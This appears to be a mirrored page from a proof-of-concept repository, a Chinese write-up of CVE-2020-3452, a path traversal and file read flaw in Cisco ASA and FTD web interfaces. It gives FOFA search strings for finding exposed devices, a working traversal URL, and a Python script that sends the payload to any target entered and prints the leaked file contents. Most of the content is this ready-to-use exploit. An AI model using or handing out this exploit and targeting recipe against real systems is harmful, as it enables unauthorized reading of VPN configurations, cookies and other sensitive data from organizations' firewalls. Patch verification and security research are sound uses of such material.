admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/network-device/Cisco ASA设备 任意文件读取漏洞 CVE-2020-3452.md
Threekiii 762e66d4a7 update gitbook
2022-02-20 16:14:31 +08:00

86 lines
2.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cisco ASA设备 任意文件读取漏洞 CVE-2020-3452
## 漏洞描述
Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件此漏洞不能用于获取对ASA或FTD系统文件或底层操作系统(OS)文件的访问所以只能读取web系统目录的文件比如webvpn的配置文件、书签、网络cookies、部分网络内容和超文本传输协议网址等信息。
## 影响版本
- Cisco ASA设备
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120091.png)
- Cisco FTD设备
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120403.png)
## FOFA
```
/+CSCOE+/
Cisco-ASA
```
## 漏洞复现
**POC如下**
```plain
https://xxx.xxx.xxx.xxx/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
会下载得到一个文件
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120622.png)
## 漏洞POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import requests
import base64
import sys
import urllib3
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: Cisco \033[0m')
print('+ \033[36m使用格式: python3 CVE-2020-1956 \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vnln_url = target_url + "/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
}
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url=vnln_url, headers=headers, verify=False ,timeout=20)
if "Bad Request" in response.text:
print("\033[31m[x] 漏洞已修复 \033[0m")
else:
print("\033[32m[o] 存在漏洞,响应为\n\033[0m",response.text)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120935.png)
Reference in New Issue View Git Blame Copy Permalink